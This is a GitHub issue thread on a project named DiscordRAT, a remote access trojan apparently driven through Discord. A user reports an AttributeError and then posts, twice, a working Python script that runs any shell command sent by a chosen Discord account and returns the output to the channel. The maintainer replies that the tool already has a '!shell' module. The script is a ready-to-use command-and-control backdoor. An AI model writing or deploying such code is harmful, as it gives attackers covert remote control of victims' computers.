### ISSUE TITLE
Atribute Error

### ISSUE THREAD

**Issue by Stammii** [Sp00p64/DiscordRAT#26]
AttributeError: 'NoneType' object has no attribute 'send'

Using withCV line 88.

**Comment by Sp00p64** [comment]
I just release a big update to the project please clone the new code and tell me if the error persists.

**Comment by Stammii** [comment]
if u havet this function already: this script can execute commands in cmd

`
botToken = 'Token'
botMaster = 'Test#0000'
import discord
import subprocess

client = discord.Client()

@client.event
async def on_message(message):

    if message.content:
        if str(message.author) == botMaster:
            comando = subprocess.getoutput(str(message.content))
            msg = 'Command granted by {0.author.mention}\n{1}'.format(message, comando)

            await message.channel.send(msg)


@client.event
async def on_ready():
    print('Logged in')

client.run(botToken)

`

**Comment by Stammii** [comment]
```
botToken = 'Token'
botMaster = 'Test#0000'
import discord
import subprocess

client = discord.Client()

@client.event
async def on_message(message):

    if message.content:
        if str(message.author) == botMaster:
            comando = subprocess.getoutput(str(message.content))
            msg = 'Command granted by {0.author.mention}\n{1}'.format(message, comando)

            await message.channel.send(msg)


@client.event
async def on_ready():
    print('Logged in')

client.run(botToken)

```

**Comment by Sp00p64** [comment]
Yes , there is a module capable of executing shell commands, it's "!shell" please do not post suggestions in issues.
